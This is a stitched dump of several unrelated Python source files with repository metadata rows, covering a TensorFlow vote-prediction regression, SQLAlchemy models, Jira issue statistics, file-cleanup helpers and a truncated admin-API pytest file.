row.figure(src="some_file.png", title="some title", caption="some text")
print(table._md)
| 40.777778 | 72 | 0.72752 | 118 | 734 | 4.432203 | 0.161017 | 0.137667 | 0.183556 | 0.244742 | 0.860421 | 0.860421 | 0.860421 | 0.860421 | 0.860421 | 0.860421 | 0 | 0 | 0.081744 | 734 | 17 | 73 | 43.176471 | 0.775964 | 0 | 0 | 0.714286 | 0 | 0 | 0.348774 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0.071429 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ebbbc7d5c1cd00c2a9d50ccce8fea8d41838b094 | 206 | py | Python | orio/utils.py | NIEHS/orio | bf996ebcf41d14b945cd5848460b023376b637ad | [
"MIT"
] | 6 | 2017-04-19T08:49:20.000Z | 2020-12-18T16:13:28.000Z | orio/utils.py | NIEHS/orio | bf996ebcf41d14b945cd5848460b023376b637ad | [
"MIT"
] | null | null | null | orio/utils.py | NIEHS/orio | bf996ebcf41d14b945cd5848460b023376b637ad | [
"MIT"
] | 1 | 2020-12-18T16:14:45.000Z | 2020-12-18T16:14:45.000Z | import os
def get_data_path():
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'data'))
def get_bin_path():
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'bin'))
| 20.6 | 75 | 0.708738 | 34 | 206 | 3.941176 | 0.352941 | 0.268657 | 0.179104 | 0.238806 | 0.746269 | 0.746269 | 0.746269 | 0.746269 | 0.746269 | 0.746269 | 0 | 0 | 0.116505 | 206 | 9 | 76 | 22.888889 | 0.736264 | 0 | 0 | 0 | 0 | 0 | 0.033981 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0 | 0.2 | 0.4 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 11 |
ebc3594fe756628916520df4dd0d002e1e0c30ef | 129 | py | Python | tests/robotframework_ls_tests/__init__.py | Snooz82/robotframework-lsp | 5f6666968f59111a5c478afd54df055d23d7274c | [
"Apache-2.0"
] | null | null | null | tests/robotframework_ls_tests/__init__.py | Snooz82/robotframework-lsp | 5f6666968f59111a5c478afd54df055d23d7274c | [
"Apache-2.0"
] | null | null | null | tests/robotframework_ls_tests/__init__.py | Snooz82/robotframework-lsp | 5f6666968f59111a5c478afd54df055d23d7274c | [
"Apache-2.0"
] | null | null | null | from _pytest.assertion import register_assert_rewrite
register_assert_rewrite("robotframework_ls_tests.language_server_client")
| 32.25 | 73 | 0.906977 | 16 | 129 | 6.75 | 0.8125 | 0.259259 | 0.388889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 129 | 3 | 74 | 43 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0.356589 | 0.356589 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
ccd7fa4239947140657d53aeeca00a323af20a61 | 8,272 | py | Python | build/lib/tec/ic/ia/p1/g08_regresion.py | Fuabioo/Proyecto-1---Predicci-n-Votaciones | d22796ca72e07a5cf4a3ecbeeabffd4cd6ac004f | [
"MIT"
] | null | null | null | build/lib/tec/ic/ia/p1/g08_regresion.py | Fuabioo/Proyecto-1---Predicci-n-Votaciones | d22796ca72e07a5cf4a3ecbeeabffd4cd6ac004f | [
"MIT"
] | null | null | null | build/lib/tec/ic/ia/p1/g08_regresion.py | Fuabioo/Proyecto-1---Predicci-n-Votaciones | d22796ca72e07a5cf4a3ecbeeabffd4cd6ac004f | [
"MIT"
] | 1 | 2021-10-20T22:13:04.000Z | 2021-10-20T22:13:04.000Z | import numpy
import pandas
from tec.ic.ia.p1 import g08_data
from tec.ic.ia.pc1 import g08
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
from sklearn.model_selection import train_test_split
from keras.utils import np_utils
import tensorflow as tf
# fix random seed for reproducibility
def regression():
seed = 7
numpy.random.seed(seed)
learning_rate = 0.001
num_epochs = 1500
display_step = 300
# load dataset
[X1, Y1],[X2, Y2],[X3, Y3] = g08_data.shaped_data_regression(10000)
x_train, x_test, y_train, y_test = train_test_split(X1, Y1, test_size = 0.1, random_state=0)
num_features = x_train.shape[1]
learning_rate = 0.01
training_epochs = 1000
tf.reset_default_graph()
# for visualize purpose in tensorboard we use tf.name_scope
with tf.name_scope("Declaring_placeholder"):
# X is placeholdre for iris features. We will feed data later on
X = tf.placeholder(tf.float32, [None, len(x_train[0])] )
# y is placeholder for iris labels. We will feed data later on
y = tf.placeholder(tf.float32, [None, len(y_train[0])] )
with tf.name_scope("Declaring_variables"):
# W is our weights. This will update during training time
W = tf.Variable(tf.zeros([len(x_train[0]), len(y_train[0])]))
# b is our bias. This will also update during training time
b = tf.Variable(tf.zeros( [len(y_train[0])] ))
Z = tf.add(tf.matmul(X, W), b)
prediction = tf.nn.softmax(Z)
# Calculate the cost
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits = Z, labels = y))
# Use Adam as optimization method
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
init = tf.global_variables_initializer()
cost_history = numpy.empty(shape=[1],dtype=float)
with tf.Session() as sess:
sess.run(init)
for epoch in range(training_epochs):
_, c = sess.run([optimizer, cost], feed_dict={X: x_train, y: y_train})
#print("Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(c), \ "W=", sess.run(W), "b=", sess.run(b))
cost_history = numpy.append(cost_history, c)
# Calculate the correct predictions
correct_prediction = tf.to_float(tf.greater(prediction, 0.5))
# Calculate accuracy on the test set
accuracy = tf.reduce_mean(tf.to_float(tf.equal(y, correct_prediction)))
prediction=tf.argmax(Z,1)
pred = prediction.eval(feed_dict={X: x_train}, session=sess)
first = [g08.PARTIDOS[int(pred[i])] for i in range(len(pred))]
pred = prediction.eval(feed_dict={X: x_test}, session=sess)
y_classes = [numpy.argmax(y, axis=None, out=None) for y in y_test]
success = 0
for i in range(len(pred)):
if pred[i] == y_classes[i]:
success+=1
first_acc = (110*success/len(pred))
first += [g08.PARTIDOS[int(pred[i])] for i in range(len(pred))]
first_acc_train = accuracy.eval({X: x_train, y: y_train})
x_train, x_test, y_train, y_test = train_test_split(X2, Y2, test_size = 0.1, random_state=0)
num_features = x_train.shape[1]
learning_rate = 0.01
training_epochs = 1000
tf.reset_default_graph()
# for visualize purpose in tensorboard we use tf.name_scope
with tf.name_scope("Declaring_placeholder"):
# X is placeholdre for iris features. We will feed data later on
X = tf.placeholder(tf.float32, [None, len(x_train[0])] )
# y is placeholder for iris labels. We will feed data later on
y = tf.placeholder(tf.float32, [None, len(y_train[0])] )
with tf.name_scope("Declaring_variables"):
# W is our weights. This will update during training time
W = tf.Variable(tf.zeros([len(x_train[0]), len(y_train[0])]))
# b is our bias. This will also update during training time
b = tf.Variable(tf.zeros( [len(y_train[0])] ))
Z = tf.add(tf.matmul(X, W), b)
prediction = tf.nn.softmax(Z)
# Calculate the cost
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits = Z, labels = y))
# Use Adam as optimization method
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
init = tf.global_variables_initializer()
cost_history = numpy.empty(shape=[1],dtype=float)
with tf.Session() as sess:
sess.run(init)
for epoch in range(training_epochs):
_, c = sess.run([optimizer, cost], feed_dict={X: x_train, y: y_train})
#print("Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(c), \ "W=", sess.run(W), "b=", sess.run(b))
cost_history = numpy.append(cost_history, c)
# Calculate the correct predictions
correct_prediction = tf.to_float(tf.greater(prediction, 0.5))
# Calculate accuracy on the test set
accuracy = tf.reduce_mean(tf.to_float(tf.equal(y, correct_prediction)))
prediction=tf.argmax(Z,1)
pred = prediction.eval(feed_dict={X: x_train}, session=sess)
second = [g08.PARTIDOS2[int(pred[i])] for i in range(len(pred))]
pred = prediction.eval(feed_dict={X: x_test}, session=sess)
y_classes = [numpy.argmax(y, axis=None, out=None) for y in y_test]
success = 0
for i in range(len(pred)):
if pred[i] == y_classes[i]:
success+=1
second_acc = (110*success/len(pred))
second += [g08.PARTIDOS2[int(pred[i])] for i in range(len(pred))]
second_acc_train = accuracy.eval({X: x_train, y: y_train})
x_train, x_test, y_train, y_test = train_test_split(X3, Y3, test_size = 0.1, random_state=0)
num_features = x_train.shape[1]
learning_rate = 0.01
training_epochs = 1000
tf.reset_default_graph()
# for visualize purpose in tensorboard we use tf.name_scope
with tf.name_scope("Declaring_placeholder"):
# X is placeholdre for iris features. We will feed data later on
X = tf.placeholder(tf.float32, [None, len(x_train[0])] )
# y is placeholder for iris labels. We will feed data later on
y = tf.placeholder(tf.float32, [None, len(y_train[0])] )
with tf.name_scope("Declaring_variables"):
# W is our weights. This will update during training time
W = tf.Variable(tf.zeros([len(x_train[0]), len(y_train[0])]))
# b is our bias. This will also update during training time
b = tf.Variable(tf.zeros( [len(y_train[0])] ))
Z = tf.add(tf.matmul(X, W), b)
prediction = tf.nn.softmax(Z)
# Calculate the cost
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits = Z, labels = y))
# Use Adam as optimization method
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
init = tf.global_variables_initializer()
cost_history = numpy.empty(shape=[1],dtype=float)
with tf.Session() as sess:
sess.run(init)
for epoch in range(training_epochs):
_, c = sess.run([optimizer, cost], feed_dict={X: x_train, y: y_train})
#print("Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(c), \ "W=", sess.run(W), "b=", sess.run(b))
cost_history = numpy.append(cost_history, c)
# Calculate the correct predictions
correct_prediction = tf.to_float(tf.greater(prediction, 0.5))
# Calculate accuracy on the test set
accuracy = tf.reduce_mean(tf.to_float(tf.equal(y, correct_prediction)))
prediction=tf.argmax(Z,1)
pred = prediction.eval(feed_dict={X: x_train}, session=sess)
third = [g08.PARTIDOS2[int(pred[i])] for i in range(len(pred))]
pred = prediction.eval(feed_dict={X: x_test}, session=sess)
y_classes = [numpy.argmax(y, axis=None, out=None) for y in y_test]
success = 0
for i in range(len(pred)):
if pred[i] == y_classes[i]:
success+=1
third_acc = (110*success/len(pred))
third += [g08.PARTIDOS2[int(pred[i])] for i in range(len(pred))]
third_acc_train = accuracy.eval({X: x_train, y: y_train})
finalDict = {
'train_set': [],
'res_1': first,
'res_2': second,
'res_3': third,
'err_train': (first_acc+second_acc+third_acc)/3,
'err_test': (first_acc_train+second_acc_train+third_acc_train)/3
'train_set': [True]*len(X1)+[False]*len(Y1),
}
return finalDict
regression() | 30.189781 | 114 | 0.657398 | 1,274 | 8,272 | 4.11303 | 0.137363 | 0.024046 | 0.018893 | 0.017176 | 0.878244 | 0.866794 | 0.866794 | 0.866794 | 0.866794 | 0.866794 | 0 | 0.024256 | 0.207568 | 8,272 | 274 | 115 | 30.189781 | 0.775133 | 0.194391 | 0 | 0.688889 | 0 | 0 | 0.025633 | 0.009499 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.066667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
692db7a164ae093b17a134da88dad9cf2e68ec07 | 136 | py | Python | test_demo.py | nsriniva/DS-Unit-3-Sprint-2-SQL-and-Databases | e5a2b5acb6a6b962a7206334f3efb79c1c65f6ed | [
"MIT"
] | null | null | null | test_demo.py | nsriniva/DS-Unit-3-Sprint-2-SQL-and-Databases | e5a2b5acb6a6b962a7206334f3efb79c1c65f6ed | [
"MIT"
] | null | null | null | test_demo.py | nsriniva/DS-Unit-3-Sprint-2-SQL-and-Databases | e5a2b5acb6a6b962a7206334f3efb79c1c65f6ed | [
"MIT"
] | null | null | null | from demo_data import row_count, xy_at_least_5, unique_y
print (f'{row_count = }')
print(f'{xy_at_least_5 = }')
print(f'{unique_y = }') | 27.2 | 56 | 0.713235 | 26 | 136 | 3.307692 | 0.538462 | 0.209302 | 0.209302 | 0.232558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016667 | 0.117647 | 136 | 5 | 57 | 27.2 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0.328467 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0.75 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
697208e691ebb9ff70962f6993cec0f9c9b1f3f1 | 1,767 | py | Python | parse/delete_script.py | damiso15/excel_microservice | 4c1b57ad6b5d1afb455d55ea97981b8ecc7c28f6 | [
"MIT"
] | null | null | null | parse/delete_script.py | damiso15/excel_microservice | 4c1b57ad6b5d1afb455d55ea97981b8ecc7c28f6 | [
"MIT"
] | 5 | 2021-03-30T14:07:01.000Z | 2021-09-22T19:30:11.000Z | parse/delete_script.py | damiso15/excel_microservice | 4c1b57ad6b5d1afb455d55ea97981b8ecc7c28f6 | [
"MIT"
] | null | null | null | import time
import os
from datetime import datetime
from excel_parser.settings import BASE_DIR
def clear_upload():
while True:
time_list = []
now = time.mktime(datetime.now().timetuple())
directory = os.path.join(BASE_DIR, 'media/upload')
for file in os.listdir(directory):
file = os.path.join(directory, file)
# get file creation/modification time
file_time = os.path.getmtime(file)
if now - file_time > 10:
os.remove(file)
else:
# add time info to list
time_list.append(file_time)
# after check all files, choose the oldest file creation time from list
# if time_list is empty, set sleep time as 300 seconds, else calculate it based on the oldest file creation time
sleep_time = (now - min(time_list)) if time_list else 15
time.sleep(sleep_time + 5)
def clear_download():
while True:
time_list = []
now = time.mktime(datetime.now().timetuple())
directory = os.path.join(BASE_DIR, 'media/user')
for file in os.listdir(directory):
file = os.path.join(directory, file)
# get file creation/modification time
file_time = os.path.getmtime(file)
if now - file_time > 10:
os.remove(file)
else:
# add time info to list
time_list.append(file_time)
# after check all files, choose the oldest file creation time from list
# if time_list is empty, set sleep time as 300 seconds, else calculate it based on the oldest file creation time
sleep_time = (now - min(time_list)) if time_list else 15
time.sleep(sleep_time + 5)
| 37.595745 | 120 | 0.608942 | 239 | 1,767 | 4.393305 | 0.259414 | 0.07619 | 0.038095 | 0.08 | 0.885714 | 0.885714 | 0.885714 | 0.885714 | 0.885714 | 0.885714 | 0 | 0.013169 | 0.312394 | 1,767 | 46 | 121 | 38.413043 | 0.851029 | 0.269949 | 0 | 0.75 | 0 | 0 | 0.017174 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.125 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d6eb1a30033c7065293e851ce900424a8ae5efdd | 1,945 | py | Python | forest_monitor/models/deter.py | claudiobogossian/forest-monitor | 0df8d05aecb02d3b97e7ce3d763f88dfcd5ea3f3 | [
"MIT"
] | null | null | null | forest_monitor/models/deter.py | claudiobogossian/forest-monitor | 0df8d05aecb02d3b97e7ce3d763f88dfcd5ea3f3 | [
"MIT"
] | null | null | null | forest_monitor/models/deter.py | claudiobogossian/forest-monitor | 0df8d05aecb02d3b97e7ce3d763f88dfcd5ea3f3 | [
"MIT"
] | null | null | null | import datetime
from geoalchemy2 import Geometry
from sqlalchemy import BigInteger, Column, Date, DateTime, Integer, Numeric, String, Text
from forest_monitor.models import BaseModel
class Deter(BaseModel):
__tablename__ = 'deter'
id = Column(Integer, primary_key=True)
geom = Geometry(geometry_type='MULTIPOLYGON', srid=4326, spatial_index=True)
classname = Column(String(254))
quadrant = Column(String(5))
path_row = Column(String(10))
view_date = Column(Date)
sensor = Column(String(10))
satellite = Column(String(13))
areauckm = Column(Numeric)
uc = Column(String(254))
areamunkm = Column(Numeric)
municipali = Column(String(254))
uf = Column(String(2))
scene_id = Column(String(254))
source = Column(String(2))
user_id = Column(String(254))
ncar_ids = Column(Integer)
car_imovel_id = Column(Text(2048))
created_at = Column(Date,
default=datetime.date.today(),
onupdate=datetime.date.today())
image_date = Column(Date)
class MascaraDeter(BaseModel):
__tablename__ = 'mascara_deter'
id = Column(Integer, primary_key=True)
geom = Geometry(geometry_type='MULTIPOLYGON', srid=4326, spatial_index=True)
classname = Column(String(254))
quadrant = Column(String(5))
path_row = Column(String(10))
view_date = Column(Date)
sensor = Column(String(10))
satellite = Column(String(13))
areauckm = Column(Numeric)
uc = Column(String(254))
areamunkm = Column(Numeric)
municipali = Column(String(254))
uf = Column(String(2))
scene_id = Column(String(254))
source = Column(String(2))
user_id = Column(String(254))
ncar_ids = Column(Integer)
car_imovel_id = Column(Text(2048))
created_at = Column(Date,
default=datetime.date.today(),
onupdate=datetime.date.today())
image_date = Column(Date)
| 32.416667 | 89 | 0.661697 | 232 | 1,945 | 5.400862 | 0.275862 | 0.210694 | 0.119713 | 0.05427 | 0.822027 | 0.822027 | 0.822027 | 0.822027 | 0.822027 | 0.822027 | 0 | 0.042848 | 0.220051 | 1,945 | 59 | 90 | 32.966102 | 0.783125 | 0 | 0 | 0.846154 | 0 | 0 | 0.021594 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.923077 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
ba3842d998555e3bd8dcff0255e76ef944265c17 | 711 | py | Python | cmn/models.py | MartinStevko/matikNoHa | 5e97db097da7e48243eeb13674bf1495fe00f67f | [
"MIT"
] | null | null | null | cmn/models.py | MartinStevko/matikNoHa | 5e97db097da7e48243eeb13674bf1495fe00f67f | [
"MIT"
] | null | null | null | cmn/models.py | MartinStevko/matikNoHa | 5e97db097da7e48243eeb13674bf1495fe00f67f | [
"MIT"
] | null | null | null | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
class Post(models.Model):
author = models.ForeignKey(User, on_delete=models.PROTECT, default=1)
obsah = models.TextField()
cas = models.DateTimeField(default=timezone.now)
schvalene = models.BooleanField(default=False)
def __str__(self):
return "Post {}".format(self.id)
class Backup(models.Model):
author = models.ForeignKey(User, on_delete=models.PROTECT, default=1)
obsah = models.TextField()
cas = models.DateTimeField(default=timezone.now)
schvalene = models.BooleanField(default=False)
def __str__(self):
return "Post {}".format(self.id)
| 32.318182 | 73 | 0.722925 | 89 | 711 | 5.662921 | 0.393258 | 0.059524 | 0.06746 | 0.09127 | 0.781746 | 0.781746 | 0.781746 | 0.781746 | 0.781746 | 0.781746 | 0 | 0.00335 | 0.160338 | 711 | 21 | 74 | 33.857143 | 0.840871 | 0 | 0 | 0.705882 | 0 | 0 | 0.019691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.176471 | 0.117647 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
ba74ca81b8f949bcb9fe8b08db6e9621abf2bffc | 4,719 | py | Python | calculation.py | capan/jiraExcelReport | 09f457d96ef6aa37030ce6805241a0cdef3c926d | [
"MIT"
] | 2 | 2018-10-11T08:37:51.000Z | 2018-10-31T07:04:58.000Z | calculation.py | capan/jiraExcelReport | 09f457d96ef6aa37030ce6805241a0cdef3c926d | [
"MIT"
] | null | null | null | calculation.py | capan/jiraExcelReport | 09f457d96ef6aa37030ce6805241a0cdef3c926d | [
"MIT"
] | null | null | null | import datetime as d
import numpy as np
ymd_create = []
ymd_resdate = []
delta_t = []
class calculate:
def __init__(self):
self.result = 0
def meantime(self, issueobject):
for i in range(0, len(issueobject)):
ymd_create.append(d.datetime(int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'created'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[1])))
ymd_resdate.append(d.datetime(int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'resolutiondate'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[1])))
delta_t.append((ymd_resdate[i] - ymd_create[i]).days)
self.result = np.mean(np.array(delta_t))
return self.result
def mediantime(self, issueobject):
for i in range(0, len(issueobject)):
ymd_create.append(d.datetime(int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'created'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[1])))
ymd_resdate.append(d.datetime(int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'resolutiondate'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[1])))
delta_t.append((ymd_resdate[i] - ymd_create[i]).days)
self.result = np.median(np.array(delta_t))
return self.result
def variancetime(self, issueobject):
for i in range(0, len(issueobject)):
ymd_create.append(d.datetime(int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'created'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[1])))
ymd_resdate.append(d.datetime(int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'resolutiondate'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[1])))
delta_t.append((ymd_resdate[i] - ymd_create[i]).days)
self.result = np.var(np.array(delta_t))
return self.result
| 107.25 | 428 | 0.457512 | 538 | 4,719 | 3.966543 | 0.079926 | 0.196814 | 0.210872 | 0.253046 | 0.934864 | 0.934864 | 0.934864 | 0.921275 | 0.891284 | 0.891284 | 0 | 0.020228 | 0.329519 | 4,719 | 43 | 429 | 109.744186 | 0.654235 | 0 | 0 | 0.6 | 0 | 0 | 0.11761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0 | 0.057143 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ba7521cc4e1ce611befabbd7ed069a82d837f5c5 | 587 | py | Python | la_parra/la_parra/web_form_advanced/prueba_1/prueba_1.py | Nirchains/parra | e6da1b393e2377ad6f8c1f3327e18f6f2fd8ba3a | [
"MIT"
] | null | null | null | la_parra/la_parra/web_form_advanced/prueba_1/prueba_1.py | Nirchains/parra | e6da1b393e2377ad6f8c1f3327e18f6f2fd8ba3a | [
"MIT"
] | null | null | null | la_parra/la_parra/web_form_advanced/prueba_1/prueba_1.py | Nirchains/parra | e6da1b393e2377ad6f8c1f3327e18f6f2fd8ba3a | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
import frappe
def get_context(context):
# do your magic here
pass
#def get_context(context):
# if frappe.form_dict.project:
# context.parents = [{'title': frappe.form_dict.project, 'route': '/projects?project='+ frappe.form_dict.project}]
# context.success_url = "/projects?project=" + frappe.form_dict.project
# elif context.doc and context.doc.get('project'):
# context.parents = [{'title': context.doc.project, 'route': '/projects?project='+ context.doc.project}]
# context.success_url = "/projects?project=" + context.doc.project
| 32.611111 | 115 | 0.734242 | 76 | 587 | 5.5 | 0.355263 | 0.200957 | 0.133971 | 0.200957 | 0.473684 | 0.30622 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110733 | 587 | 17 | 116 | 34.529412 | 0.800766 | 0.810903 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.5 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
ba826126daa4a589fc3da5c0063bbadcfceb6411 | 31,521 | py | Python | application/src/pytest/python/modules/user_account/routes_admin_test.py | okebinda/base.api.python | fdf6dc02ab73d588919f38d6017788f7822cfd04 | [
"Apache-2.0"
] | null | null | null | application/src/pytest/python/modules/user_account/routes_admin_test.py | okebinda/base.api.python | fdf6dc02ab73d588919f38d6017788f7822cfd04 | [
"Apache-2.0"
] | 2 | 2021-06-02T03:26:04.000Z | 2021-09-30T03:04:00.000Z | application/src/pytest/python/modules/user_account/routes_admin_test.py | okebinda/base.api.python | fdf6dc02ab73d588919f38d6017788f7822cfd04 | [
"Apache-2.0"
] | null | null | null | from copy import copy
import re
import base64
import pytest
from werkzeug.exceptions import NotFound, Unauthorized
from sqlalchemy.orm.exc import NoResultFound
from fixtures import Fixtures
from app import create_app
from config import Config
from modules.user_account.routes_admin import get_account, put_account, \
put_password
from modules.administrators.model import Administrator, \
AdministratorPasswordHistory
from modules.roles.model import Role
from modules.app_keys.model import AppKey
@pytest.fixture
def app(request):
config = copy(Config)
config.TESTING = True
config.APP_TYPE = 'admin' if 'admin_api' in request.keywords else 'public'
app = create_app(config)
if 'unit' in request.keywords:
yield app
else:
fixtures = Fixtures(app)
fixtures.setup()
yield app
fixtures.teardown()
# UNIT TESTS
@pytest.mark.unit
@pytest.mark.admin_api
def test_get_account_ok(app, mocker):
expected_status = 200
expected_json = {
'email': None,
'first_name': None,
'id': None,
'joined_at': None,
'last_name': None,
'password_changed_at': None,
'uri': None,
'username': None,
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
result = get_account()
assert result[1] == expected_status
assert result[0].json['user_account'] == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_get_account_route_ok(app, mocker, client):
expected_status = 200
# mock db query
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.return_value = AppKey()
# mock user login db query
role2 = Role()
role2.id = 2
role2.name = 'SUPER_ADMIN'
role2.password_reset_days = 365
admin1 = Administrator()
admin1.id = 1
admin1.password = 'admin1pass'
admin1.roles = [role2]
query_mock.return_value \
.filter.return_value \
.first.return_value = admin1
db_mock = mocker.patch('modules.administrators.authentication.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
# mock user login
auth_mock = mocker.patch(
'modules.administrators.Authentication.is_account_locked')
auth_mock.return_value = False
credentials = base64.b64encode(
'admin1:admin1pass'.encode('ascii')).decode('utf-8')
